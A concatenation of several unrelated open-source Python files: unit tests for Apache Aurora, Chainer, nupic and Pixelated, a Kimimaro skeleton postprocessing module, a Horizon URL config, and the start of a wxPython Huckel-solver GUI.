def assert_create_job_called(cls, mock_api):
# Check that create_job was called exactly once, with an AuroraConfig parameter.
assert mock_api.create_job.call_count == 1
assert isinstance(mock_api.create_job.call_args_list[0][0][0], AuroraConfig)
@classmethod
def assert_scheduler_called(cls, mock_api, mock_query, num_queries):
assert mock_api.scheduler_proxy.getTasksWithoutConfigs.call_count == num_queries
mock_api.scheduler_proxy.getTasksWithoutConfigs.assert_called_with(mock_query)
def test_create_job_with_successful_hook(self):
GlobalCommandHookRegistry.reset()
command_hook = HookForTesting(True)
GlobalCommandHookRegistry.register_command_hook(command_hook)
mock_context = FakeAuroraCommandContext()
with patch("apache.aurora.client.cli.jobs.Job.create_context", return_value=mock_context):
mock_query = self.create_query()
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.INIT))
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.RUNNING))
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.RUNNING))
mock_context.get_api("west").check_status.side_effect = (
lambda x: self.create_mock_status_query_result(ScheduleStatus.RUNNING))
api = mock_context.get_api("west")
api.create_job.return_value = self.get_createjob_response()
with temporary_file() as fp:
fp.write(self.get_valid_config())
fp.flush()
cmd = AuroraCommandLine()
cmd.execute(["job", "create", "--wait-until=RUNNING", "west/bozo/test/hello",
fp.name])
self.assert_create_job_called(api)
self.assert_scheduler_called(api, mock_query, 1)
assert command_hook.ran_pre
assert command_hook.ran_post
def test_create_job_with_failed_hook(self):
GlobalCommandHookRegistry.reset()
command_hook = HookForTesting(False)
GlobalCommandHookRegistry.register_command_hook(command_hook)
mock_context = FakeAuroraCommandContext()
with patch("apache.aurora.client.cli.jobs.Job.create_context", return_value=mock_context):
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.INIT))
mock_context.add_expected_status_query_result(
self.create_mock_status_query_result(ScheduleStatus.RUNNING))
api = mock_context.get_api("west")
api.create_job.return_value = self.get_createjob_response()
with temporary_file() as fp:
fp.write(self.get_valid_config())
fp.flush()
cmd = AuroraCommandLine()
result = cmd.execute(["job", "create", "--wait-until=RUNNING", "west/bozo/test/hello",
fp.name])
assert result == 1
assert api.create_job.call_count == 0
assert command_hook.ran_pre
assert not command_hook.ran_post
| apache-2.0 | 11,837,275,848,459,540 | 35.664474 | 94 | 0.708774 | false |
hvy/chainer | tests/chainer_tests/functions_tests/evaluation_tests/test_accuracy.py | 6 | 4114 | import unittest
import numpy
import six
import chainer
from chainer.backends import cuda
from chainer import functions
from chainer import testing
from chainer.testing import attr
from chainer.utils import force_array
from chainer.utils import type_check
def accuracy(x, t, ignore_label):
x_ = numpy.rollaxis(x, 1, x.ndim).reshape(t.size, -1)
t_ = t.ravel()
if ignore_label is not None:
count = 0
for i in six.moves.range(t_.size):
pred = x_[i].argmax()
if t_[i] != ignore_label and pred == t_[i]:
count += 1
total = (t_ != ignore_label).sum()
else:
count = 0
for i in six.moves.range(t_.size):
pred = x_[i].argmax()
if pred == t_[i]:
count += 1
total = t_.size
if total == 0:
return 0.0
else:
return float(count) / total
@testing.parameterize(
*testing.product_dict(
[{'x_shape': (10, 3), 't_shape': (10,)},
{'x_shape': (10, 3, 1), 't_shape': (10,)},
{'x_shape': (10, 3, 1, 1), 't_shape': (10,)},
{'x_shape': (10, 3, 5), 't_shape': (10, 5)},
{'x_shape': (10, 3, 5, 4), 't_shape': (10, 5, 4)},
{'x_shape': (10, 3, 5, 4, 1), 't_shape': (10, 5, 4)},
{'x_shape': (10, 3, 5, 4, 1, 1), 't_shape': (10, 5, 4)}],
[{'ignore_label': None, 't_data': 'randint'},
{'ignore_label': 0, 't_data': 'randint'},
{'ignore_label': 0, 't_data': 'zero'}],
[{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}],
[{'label_dtype': numpy.int8},
{'label_dtype': numpy.int16},
{'label_dtype': numpy.int32},
{'label_dtype': numpy.int64}]
)
)
@testing.fix_random()
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
class TestAccuracy(testing.FunctionTestCase):
def setUp(self):
self.skip_backward_test = True
self.skip_double_backward_test = True
if self.dtype == numpy.float16:
self.check_forward_options.update({'atol': 1e-4, 'rtol': 1e-3})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.x_shape).astype(self.dtype)
if self.t_data == 'randint':
t = numpy.random.randint(
3, size=self.t_shape).astype(self.label_dtype)
elif self.t_data == 'zero':
t = numpy.zeros(self.t_shape).astype(self.label_dtype)
return x, t
def forward(self, inputs, device):
x, t = inputs
return functions.accuracy(x, t, self.ignore_label),
def forward_expected(self, inputs):
x, t = inputs
expected = accuracy(x, t, self.ignore_label)
expected = force_array(expected, self.dtype)
return expected,
@testing.parameterize(
{'x_shape': (10, 3), 't_shape': (4,)},
{'x_shape': (10, 3, 2), 't_shape': (10,)},
{'x_shape': (10, 3, 1, 2), 't_shape': (10,)},
{'x_shape': (10, 3, 4), 't_shape': (10, 5)},
{'x_shape': (10, 3, 5, 2), 't_shape': (10, 5)},
{'x_shape': (10, 3, 5, 1, 2), 't_shape': (10, 5)},
)
class TestInvalidShape(unittest.TestCase):
def setUp(self):
self.x = numpy.random.uniform(-1, 1,
self.x_shape).astype(numpy.float32)
self.t = numpy.random.randint(3, size=self.t_shape).astype(numpy.int32)
def check_invalid_shape(self, xp):
x = chainer.Variable(xp.asarray(self.x))
t = chainer.Variable(xp.asarray(self.t))
with self.assertRaises(type_check.InvalidType):
functions.accuracy(x, t)
def test_invalid_shape_cpu(self):
self.check_invalid_shape(numpy)
@attr.gpu
def test_invalid_shape_gpu(self):
self.check_invalid_shape(cuda.cupy)
testing.run_module(__name__, __file__)
| mit | 8,064,799,634,941,198,000 | 29.029197 | 79 | 0.533787 | false |
seung-lab/kimimaro | kimimaro/postprocess.py | 1 | 19044 | """
Postprocessing for joining skeletons chunks generated by
skeletonizing adjacent image chunks.
Authors: Alex Bae and Will Silversmith
Affiliation: Seung Lab, Princeton Neuroscience Institue
Date: June 2018 - June 2019
This file is part of Kimimaro.
Kimimaro is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Kimimaro is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Kimimaro. If not, see <https://www.gnu.org/licenses/>.
"""
from collections import defaultdict
import networkx as nx
import numpy as np
from scipy import spatial
from scipy.sparse import lil_matrix
from scipy.sparse.csgraph import dijkstra
import scipy.sparse.csgraph as csgraph
import scipy.spatial.distance
from cloudvolume import Skeleton, Bbox
import kimimaro.skeletontricks
## Public API of Module
def postprocess(skeleton, dust_threshold=1500, tick_threshold=3000):
"""
 Postprocessing of a skeleton fuses the skeletons of adjacent
 or overlapping image chunks into a single coherent skeleton.
The following steps are applied:
1) Remove disconnected components smaller than the
dust threshold (measured in physical distance).
2) Skeletons are supposed to be trees, so we remove
any loops that were introduced by joining chunks
together. Loops that occur inside the lumen of a
neuron might be collapsed into their centroid. Loops
 that occur due to, e.g., mergers are broken arbitrarily.
3) Disconnected components that are closer than the sum
of their boundary distance are connected.
4) Small "ticks", or branches from the main skeleton, are
removed one at a time, from smallest to largest. Branches
larger than the physical tick_threshold are preserved.
Returns: Skeleton
"""
label = skeleton.id
# necessary for removing trivial loops etc
# remove_loops and remove_ticks assume a
# clean representation
skeleton = skeleton.consolidate()
skeleton = remove_dust(skeleton, dust_threshold)
skeleton = remove_loops(skeleton)
skeleton = connect_pieces(skeleton)
skeleton = remove_ticks(skeleton, tick_threshold)
skeleton.id = label
return skeleton.consolidate()
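# Illustrative sketch (not part of the module): typical use after skeletonizing
# a labeled volume with kimimaro; the `skels` dictionary, the label 17 and the
# thresholds are hypothetical placeholders.
#
#   skels = kimimaro.skeletonize(labels)          # { label: Skeleton, ... }
#   clean = postprocess(skels[17], dust_threshold=1500, tick_threshold=3000)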
def join_close_components(skeletons, radius=None):
"""
Given a set of skeletons which may contain multiple connected components,
attempt to connect each component to the nearest other component via the
 nearest two vertices. Repeat until a single component remains or no points closer
than `radius` are available.
radius: float in same units as skeletons
Returns: Skeleton
"""
if radius is not None and radius <= 0:
raise ValueError("radius must be greater than zero: " + str(radius))
if isinstance(skeletons, Skeleton):
skeletons = [ skeletons ]
skels = []
for skeleton in skeletons:
skels += skeleton.components()
skels = [ skl.consolidate() for skl in skels if not skl.empty() ]
if len(skels) == 1:
return skels[0]
elif len(skels) == 0:
return Skeleton()
while len(skels) > 1:
N = len(skels)
radii_matrix = np.zeros( (N, N), dtype=np.float32 ) + np.inf
index_matrix = np.zeros( (N, N, 2), dtype=np.uint32 ) + -1
for i in range(len(skels)):
for j in range(len(skels)):
if i == j:
continue
elif radii_matrix[i,j] != np.inf:
continue
s1, s2 = skels[i], skels[j]
dist_matrix = scipy.spatial.distance.cdist(s1.vertices, s2.vertices)
radii_matrix[i,j] = np.min(dist_matrix)
radii_matrix[j,i] = radii_matrix[i,j]
index_matrix[i,j] = np.unravel_index( np.argmin(dist_matrix), dist_matrix.shape )
index_matrix[j,i] = index_matrix[i,j]
if np.all(radii_matrix == np.inf):
break
min_radius = np.min(radii_matrix)
if radius is not None and min_radius > radius:
break
i, j = np.unravel_index( np.argmin(radii_matrix), radii_matrix.shape )
s1, s2 = skels[i], skels[j]
fused = Skeleton.simple_merge([s1, s2])
fused.edges = np.concatenate([
fused.edges,
[[ index_matrix[i,j,0], index_matrix[i,j,1] + s1.vertices.shape[0] ]]
])
skels[i] = None
skels[j] = None
skels = [ _ for _ in skels if _ is not None ] + [ fused ]
return Skeleton.simple_merge(skels).consolidate()
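# Illustrative sketch (not part of the module): fuse nearby fragments of one
# object, refusing to bridge gaps wider than 500 units; the skeleton names and
# the radius are hypothetical.
#
#   fused = join_close_components([skel_a, skel_b, skel_c], radius=500)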
## Implementation Details Below
def combination_pairs(n):
pairs = np.array([])
for i in range(n):
for j in range(n-i-1):
pairs = np.concatenate((pairs, np.array([i, i+j+1 ])))
pairs = np.reshape(pairs,[ pairs.shape[0] // 2, 2 ])
return pairs.astype(np.uint16)
def find_connected(nodes, edges):
s = nodes.shape[0]
nodes = np.unique(edges).astype(np.uint32)
conn_mat = lil_matrix((s, s), dtype=bool)
conn_mat[edges[:,0], edges[:,1]] = 1
n, l = csgraph.connected_components(conn_mat, directed=False)
l_nodes = l[nodes]
l_list = np.unique(l_nodes)
return [ l == i for i in l_list ]
def remove_dust(skeleton, dust_threshold):
"""Dust threshold in physical cable length."""
if skeleton.empty() or dust_threshold == 0:
return skeleton
skels = []
for skel in skeleton.components():
if skel.cable_length() > dust_threshold:
skels.append(skel)
return Skeleton.simple_merge(skels)
def connect_pieces(skeleton):
if skeleton.empty():
return skeleton
nodes = skeleton.vertices
edges = skeleton.edges
radii = skeleton.radii
all_connected = True
while all_connected:
connected = find_connected(nodes, edges)
pairs = combination_pairs(len(connected))
all_connected = False
for i in range(pairs.shape[0]):
path_piece = connected[pairs[i,0]]
nodes_piece = nodes[path_piece].astype(np.float32)
nodes_piece_idx = np.where(path_piece)[0]
path_tree = connected[pairs[i,1]]
nodes_tree = nodes[path_tree]
nodes_tree_idx = np.where(path_tree)[0]
tree = spatial.cKDTree(nodes_tree)
(dist, idx) = tree.query(nodes_piece)
min_dist = np.min(dist)
min_dist_idx = int(np.where(dist == min_dist)[0][0])
start_idx = nodes_piece_idx[min_dist_idx]
end_idx = nodes_tree_idx[idx[min_dist_idx]]
# test if line between points exits object
if (radii[start_idx] + radii[end_idx]) >= min_dist:
new_edge = np.array([[ start_idx, end_idx ]])
edges = np.concatenate((edges, new_edge), axis=0)
all_connected = True
break
skeleton.edges = edges
return skeleton
def remove_ticks(skeleton, threshold):
"""
 Simple merging of individual TEASAR cubes results in lots of little
ticks due to the edge effect. We can remove them by thresholding
the path length from a given branch to the "main body" of the neurite.
We successively remove paths from shortest to longest until no branches
below threshold remain.
If TEASAR parameters were chosen such that they allowed for spines to
be traced, this is also an opportunity to correct for that.
This algorithm is O(N^2) in the number of terminal nodes.
Parameters:
threshold: The maximum length in nanometers that may be culled.
Returns: tick free skeleton
"""
if skeleton.empty() or threshold == 0:
return skeleton
skels = []
for component in skeleton.components():
skels.append(_remove_ticks(component, threshold))
return Skeleton.simple_merge(skels).consolidate(remove_disconnected_vertices=False)
def _remove_ticks(skeleton, threshold):
"""
For a single connected component, remove "ticks" below a threshold.
Ticks are a path connecting a terminal node to a branch point that
are physically shorter than the specified threshold.
Every time a tick is removed, it potentially changes the topology
of the components. Once a branch point's number of edges drops to
two, the two paths connecting to it can be unified into one. Sometimes
a single object exists that has no branches but is below threshold. We
do not delete these objects as there would be nothing left.
Each time the minimum length tick is removed, it can change which
tick is the new minimum tick and requires reevaluation of the whole
skeleton. Previously, we did not perform this reevaluation and it
resulted in the ends of neurites being clipped.
This makes the algorithm quadratic in the number of terminal branches.
As high resolution skeletons can have tens of thousands of nodes and
dozens of branches, a full topological reevaluation becomes relatively
expensive. However, we only need to know the graph of distances between
critical points, defined as the set of branch points and terminal points,
in the skeleton in order to evaluate the topology.
Therefore, we first compute this distance graph before proceeding with
tick removal. The algorithm remains quadratic in the number of terminal
points, but the constant speed up is very large as we move from a regime
of tens of thousands to hundreds of thousands of points needing reevaluation
to at most hundreds and often only a handful in typical cases. In the
pathological case of a skeleton with numerous single point extrusions,
the performance of the algorithm collapses approximately to the previous
 regime (though without the assistance of the constant factor of numpy speed).
Requires:
skeleton: a Skeleton that is guaranteed to be a single
connected component.
threshold: distance in nanometers below which a branch is considered
a "tick" eligible to be removed.
Returns: a "tick" free Skeleton
"""
if skeleton.empty():
return skeleton
dgraph = kimimaro.skeletontricks.create_distance_graph(skeleton)
vertices = skeleton.vertices
edges = skeleton.edges
unique_nodes, unique_counts = np.unique(edges, return_counts=True)
terminal_nodes = set(unique_nodes[ unique_counts == 1 ])
branch_idx = np.where(unique_counts >= 3)[0]
branch_counts = defaultdict(int)
for i in branch_idx:
branch_counts[unique_nodes[i]] = unique_counts[i]
G = nx.Graph()
G.add_edges_from(edges)
terminal_superedges = set([ edg for edg in dgraph.keys() if (edg[0] in terminal_nodes or edg[1] in terminal_nodes) ])
def fuse_edge(edg1):
unify = [ edg for edg in dgraph.keys() if edg1 in edg ]
new_dist = 0.0
for edg in unify:
terminal_superedges.discard(edg)
new_dist += dgraph[edg]
del dgraph[edg]
unify = set([ item for sublist in unify for item in sublist ])
unify.remove(edg1)
dgraph[tuple(unify)] = new_dist
terminal_superedges.add(tuple(unify))
branch_counts[edg1] = 0
while len(dgraph) > 1:
min_edge = min(terminal_superedges, key=dgraph.get)
e1, e2 = min_edge
if branch_counts[e1] == 1 and branch_counts[e2] == 1:
break
elif dgraph[min_edge] >= threshold:
break
path = nx.shortest_path(G, e1, e2)
path = [ (path[i], path[i+1]) for i in range(len(path) - 1) ]
G.remove_edges_from(path)
del dgraph[min_edge]
terminal_superedges.remove(min_edge)
branch_counts[e1] -= 1
branch_counts[e2] -= 1
if branch_counts[e1] == 2:
fuse_edge(e1)
if branch_counts[e2] == 2:
fuse_edge(e2)
skel = skeleton.clone()
skel.edges = np.array(list(G.edges), dtype=np.uint32)
return skel
def _create_distance_graph(skeleton):
"""
Creates the distance "supergraph" from a single connected component
skeleton as described in _remove_ticks.
Returns: a distance "supergraph" describing the physical distance
between the critical points in the skeleton's structure.
Example skeleton with output:
60nm 60nm 60nm
1------2------3------4
30nm | 70nm \
5 ----6
{
(1,2): 60,
(2,3): 60,
(2,5): 30,
(3,4): 60,
(3,6): 70,
}
"""
vertices = skeleton.vertices
edges = skeleton.edges
unique_nodes, unique_counts = np.unique(edges, return_counts=True)
terminal_nodes = unique_nodes[ unique_counts == 1 ]
branch_nodes = set(unique_nodes[ unique_counts >= 3 ])
critical_points = set(terminal_nodes)
critical_points.update(branch_nodes)
tree = defaultdict(set)
for e1, e2 in edges:
tree[e1].add(e2)
tree[e2].add(e1)
# The below depth first search would be
# more elegantly implemented as recursion,
# but it quickly blows the stack, mandating
# an iterative implementation.
stack = [ terminal_nodes[0] ]
parents = [ -1 ]
dist_stack = [ 0.0 ]
root_stack = [ terminal_nodes[0] ]
distgraph = defaultdict(float) # the distance "supergraph"
while stack:
node = stack.pop()
dist = dist_stack.pop()
root = root_stack.pop()
parent = parents.pop()
if node in critical_points and node != root:
distgraph[ (root, node) ] = dist
dist = 0.0
root = node
for child in tree[node]:
if child != parent:
stack.append(child)
parents.append(node)
dist_stack.append(
dist + np.linalg.norm(vertices[node,:] - vertices[child,:])
)
root_stack.append(root)
return distgraph
def remove_loops(skeleton):
if skeleton.empty():
return skeleton
skels = []
for component in skeleton.components():
skels.append(_remove_loops(component))
return Skeleton.simple_merge(skels).consolidate(remove_disconnected_vertices=False)
def _remove_loops(skeleton):
nodes = skeleton.vertices
edges = np.copy(skeleton.edges).astype(np.int32)
while True: # Loop until all cycles are removed
edges = edges.astype(np.int32)
cycle_path = kimimaro.skeletontricks.find_cycle(edges)
# cycle_path = kimimaro.skeletontricks.find_cycle_cython(edges)
if len(cycle_path) == 0:
break
edges_cycle = path2edge(cycle_path)
edges_cycle = np.array(edges_cycle, dtype=np.uint32)
edges_cycle = np.sort(edges_cycle, axis=1)
nodes_cycle = np.unique(edges_cycle)
nodes_cycle = nodes_cycle.astype(np.int32)
unique_nodes, unique_counts = np.unique(edges, return_counts=True)
branch_nodes = unique_nodes[ unique_counts >= 3 ]
# branch cycles are cycle nodes that coincide with a branch point
branch_cycle = nodes_cycle[np.isin(nodes_cycle,branch_nodes)]
branch_cycle = branch_cycle.astype(np.int32)
# Summary:
# 0 external branches: isolated loop, just remove it
# 1 external branch : remove the loop but draw a line
# from the branch point to the farthest node in the loop.
# 2 external branches: remove the shortest path between
# the two entry/exit points.
# 3+ external branches: collapse the cycle into its centroid
# if the radius of the centroid is less than the EDT radius
# of the pixel located at the centroid. Otherwise, arbitrarily
# cut an edge from the cycle to break it. This radius rule prevents
# issues where we collapse to a point outside of the neurite.
# Loop with a tail
if branch_cycle.shape[0] == 1:
branch_cycle_point = nodes[branch_cycle, :]
cycle_points = nodes[nodes_cycle, :]
dist = np.sum((cycle_points - branch_cycle_point) ** 2, 1)
end_node = nodes_cycle[np.argmax(dist)]
edges = remove_row(edges, edges_cycle)
new_edge = np.array([[branch_cycle[0], end_node]], dtype=np.int32)
edges = np.concatenate((edges, new_edge), 0)
# Loop with an entrance and an exit
elif branch_cycle.shape[0] == 2:
# compute the shortest path between the two branch points
path = np.array(cycle_path[1:])
pos = np.where(np.isin(path, branch_cycle))[0]
if (pos[1] - pos[0]) < len(path) / 2:
path = path[pos[0]:pos[1]+1]
else:
path = np.concatenate((path[pos[1]:], path[:pos[0]+1]), 0)
edge_path = path2edge(path)
edge_path = np.sort(edge_path, axis=1)
row_valid = np.ones(edges_cycle.shape[0])
for i in range(edge_path.shape[0]):
row_valid -= (edges_cycle[:,0] == edge_path[i,0]) * (edges_cycle[:,1] == edge_path[i,1])
row_valid = row_valid.astype(bool)
edge_path = edges_cycle[row_valid,:]
edges = remove_row(edges, edge_path)
# Totally isolated loop
elif branch_cycle.shape[0] == 0:
edges = remove_row(edges, edges_cycle)
# Loops with many ways in and out
# looks like here we unify them into their
# centroid. This doesn't work well if the loop
# is large.
else:
branch_cycle_points = nodes[branch_cycle,:]
centroid = np.mean(branch_cycle_points, axis=0)
dist = np.sum((nodes - centroid) ** 2, 1)
intersect_node = np.argmin(dist)
intersect_point = nodes[intersect_node,:]
dist = np.sum((branch_cycle_points - intersect_point) ** 2, 1)
dist = np.sqrt(np.max(dist))
# Fix the "stargate" issue where a large loop
# can join lots of things to the near center
# by just making a tiny snip if the distance
# is greater than the radius of the connected node.
if dist > skeleton.radii[ intersect_node ]:
edges = remove_row(edges, edges_cycle[:1,:])
continue
edges = remove_row(edges, edges_cycle)
new_edges = np.zeros((branch_cycle.shape[0], 2))
new_edges[:,0] = branch_cycle
new_edges[:,1] = intersect_node
if np.isin(intersect_node, branch_cycle):
idx = np.where(branch_cycle == intersect_node)
new_edges = np.delete(new_edges, idx, 0)
edges = np.concatenate((edges,new_edges), 0)
skeleton.vertices = nodes
skeleton.edges = edges.astype(np.uint32)
return skeleton
def path2edge(path):
"""
path: sequence of nodes
Returns: sequence separated into edges
"""
edges = np.zeros([len(path) - 1, 2], dtype=np.uint32)
edges[:,0] = path[0:-1]
edges[:,1] = path[1:]
return edges
def remove_row(array, rows2remove):
array = np.sort(array, axis=1)
rows2remove = np.sort(rows2remove, axis=1)
for i in range(rows2remove.shape[0]):
idx = find_row(array,rows2remove[i,:])
if np.sum(idx == -1) == 0:
array = np.delete(array, idx, axis=0)
return array.astype(np.int32)
def find_row(array, row):
"""
array: array to search for
row: row to find
Returns: row indices
"""
row = np.array(row)
if array.shape[1] != row.size:
raise ValueError("Dimensions do not match!")
NDIM = array.shape[1]
valid = np.zeros(array.shape, dtype=bool)
for i in range(NDIM):
valid[:,i] = array[:,i] == row[i]
row_loc = np.zeros([ array.shape[0], 1 ])
if NDIM == 2:
row_loc = valid[:,0] * valid[:,1]
elif NDIM == 3:
row_loc = valid[:,0] * valid[:,1] * valid[:,2]
idx = np.where(row_loc==1)[0]
if len(idx) == 0:
idx = -1
return idx
| gpl-3.0 | 9,190,897,515,746,704,000 | 30.634551 | 119 | 0.67197 | false |
marionleborgne/nupic.research | tests/nlp/unit/hierarchical_clustering_test.py | 8 | 4036 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have purchased from
# Numenta, Inc. a separate commercial license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import numpy
import os
import scipy.sparse
import unittest
from mock import patch
from htmresearch.algorithms.hierarchical_clustering import HierarchicalClustering
from nupic.algorithms.KNNClassifier import KNNClassifier
class TestHierarchicalClustering(unittest.TestCase):
def testComputeOverlapsWithoutDiagonal(self):
data = scipy.sparse.csr_matrix([
[1, 1, 0, 1],
[0, 1, 1, 0],
[1, 1, 1, 1]
])
dists = HierarchicalClustering._computeOverlaps(data, selfOverlaps=False)
self.assertEqual(dists.shape, (3,))
self.assertEqual(dists.tolist(), [1, 3, 2])
def testComputeOverlapsWithDiagonal(self):
data = scipy.sparse.csr_matrix([
[1, 1, 0, 1],
[0, 1, 1, 0],
[1, 1, 1, 1]
])
dists = HierarchicalClustering._computeOverlaps(data, selfOverlaps=True)
self.assertEqual(dists.shape, (6,))
self.assertEqual(dists.tolist(), [3, 1, 3, 2, 2, 4])
def testExtractVectorsFromKNN(self):
vectors = numpy.random.rand(10, 25) < 0.1
# Populate KNN
knn = KNNClassifier()
for i in xrange(vectors.shape[0]):
knn.learn(vectors[i], 0)
# Extract vectors from KNN
sparseDataMatrix = HierarchicalClustering._extractVectorsFromKNN(knn)
self.assertEqual(
sorted(sparseDataMatrix.todense().tolist()),
sorted(vectors.tolist())
)
def testCondensedIndex(self):
flat = range(6)
# first try only indexing upper triangular region
indicesA = [0, 0, 0, 1, 1, 2]
indicesB = [1, 2, 3, 2, 3, 3]
res = HierarchicalClustering._condensedIndex(indicesA, indicesB, 4)
self.assertEqual(res.tolist(), flat)
# ensure we get same result by transposing some indices for the lower
# triangular region
indicesA = [0, 2, 3, 1, 3, 2]
indicesB = [1, 0, 0, 2, 1, 3]
res = HierarchicalClustering._condensedIndex(indicesA, indicesB, 4)
self.assertEqual(res.tolist(), flat)
# finally check that we get an assertion error if we try accessing
# an element from the diagonal
with self.assertRaises(AssertionError):
indicesA = [0, 2, 0, 1, 3, 2]
indicesB = [1, 2, 3, 2, 1, 3]
_ = HierarchicalClustering._condensedIndex(indicesA, indicesB, 4)
def testGetPrototypes(self):
data = scipy.sparse.csr_matrix([
[1, 1, 0, 1],
[1, 0, 1, 1],
[0, 1, 1, 0],
[1, 1, 1, 1]
])
overlaps = HierarchicalClustering._computeOverlaps(data)
prototypes = HierarchicalClustering._getPrototypes([0, 1, 2, 3], overlaps)
self.assertEqual(set(prototypes.tolist()), set([3]))
prototypes = HierarchicalClustering._getPrototypes([1, 2, 3], overlaps, 2)
self.assertEqual(set(prototypes.tolist()), set([3, 1]))
prototypes = HierarchicalClustering._getPrototypes([0, 2, 3], overlaps, 2)
self.assertEqual(set(prototypes.tolist()), set([3, 0]))
prototypes = HierarchicalClustering._getPrototypes([0, 1, 2], overlaps, 2)
self.assertEqual(set(prototypes.tolist()), set([0, 1]))
if __name__ == "__main__":
unittest.main()
| agpl-3.0 | -6,371,929,708,740,457,000 | 31.031746 | 81 | 0.657334 | false |
tylertian/Openstack | openstack F/horizon/horizon/dashboards/nova/overview/urls.py | 3 | 1098 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls.defaults import url, patterns
from .views import ProjectOverview, WarningView
urlpatterns = patterns('horizon.dashboards.nova.overview.views',
url(r'^$', ProjectOverview.as_view(), name='index'),
url(r'^warning$', WarningView.as_view(), name='warning'),
)
| apache-2.0 | -4,844,407,295,060,887,000 | 36.862069 | 78 | 0.738616 | false |
phazel/pixelated-user-agent | service/test/unit/adapter/search/test_index_storage_key.py | 9 | 2159 | #
# Copyright (c) 2015 ThoughtWorks, Inc.
#
# Pixelated is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pixelated is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Pixelated. If not, see <http://www.gnu.org/licenses/>.
from leap.soledad.common.document import SoledadDocument
from mockito import mock, when, unstub, verify
from twisted.internet import defer
from twisted.trial import unittest
from pixelated.adapter.search.index_storage_key import SearchIndexStorageKey
import os
class TestSearchIndexStorageKey(unittest.TestCase):
def tearDown(self):
unstub()
@defer.inlineCallbacks
def test_get_or_create_key_returns_key(self):
soledad = mock()
when(soledad).get_from_index('by-type', 'index_key').thenReturn([SoledadDocument(json='{"value": "somekey"}')])
key = yield SearchIndexStorageKey(soledad).get_or_create_key()
self.assertEqual('somekey', key)
@defer.inlineCallbacks
def test_get_or_create_creates_key_if_not_exists(self):
expected_key = '\x8brN\xa3\xe5-\x828 \x95\x8d\n\xc6\x0c\x82\n\xd7!\xa9\xb0.\xcc\\h\xa9\x98\xe9V\xc1*<\xfe\xbb\x8f\xcd\x7f\x8c#\xff\xf9\x840\xdf{}\x97\xebS-*\xe2f\xf9B\xa9\xb1\x0c\x1d-C)\xc5\xa0B'
base64_encoded_key = 'i3JOo+UtgjgglY0KxgyCCtchqbAuzFxoqZjpVsEqPP67j81/jCP/+YQw33t9l+tTLSriZvlCqbEM\nHS1DKcWgQg==\n'
soledad = mock()
when(soledad).get_from_index('by-type', 'index_key').thenReturn([])
when(os).urandom(64).thenReturn(expected_key)
key = yield SearchIndexStorageKey(soledad).get_or_create_key()
self.assertEqual(expected_key, key)
verify(soledad).create_doc(dict(type='index_key', value=base64_encoded_key))
| agpl-3.0 | -5,284,624,681,563,570,000 | 40.519231 | 203 | 0.724873 | false |
randlet/Orbis | orbis/orbis.py | 1 | 2525 | import gui
import gui.grid_utils
import numpy
import settings
import shmo
import sys
import os
os.chdir(os.path.dirname(__file__))
import wx
#====================================================================================
class MainFrame(gui.VOrbisFrame):
"""The main Orbis application frame"""
#----------------------------------------------------------------------
def __init__(self,parent,*args, **kwargs):
"""do any initial setup required for Orbis"""
super(MainFrame,self).__init__(parent,*args,**kwargs)
self.SetTitle(settings.TITLE)
self.Layout()
self.Fit()
self.Maximize()
self.solver = shmo.HuckelSolver()
#---------------------------------------------------------------------------
def on_huckel_change(self,event):
"""some parameter of molecule has been changed, update solver"""
num_electrons = self.num_electrons.GetValue()
data = self.get_huckel_data()
self.solver.set_data(data,num_electrons=num_electrons)
#---------------------------------------------------------------------------
def get_huckel_data(self):
"""return current atom/bond matrix for solver"""
shape = gui.grid_utils.get_shape(self.huckel_grid)
data = numpy.zeros(shape)
for row in range(shape[0]):
for col in range(shape[1]):
try:
data[row, col] = float(self.huckel_grid.GetCellValue(row,col).strip())
except (TypeError,ValueError):
data[row, col] = 0.
return numpy.matrix(data)
#---------------------------------------------------------------------------
def set_huckel_data(self,data):
"""set huckel matrix to input data"""
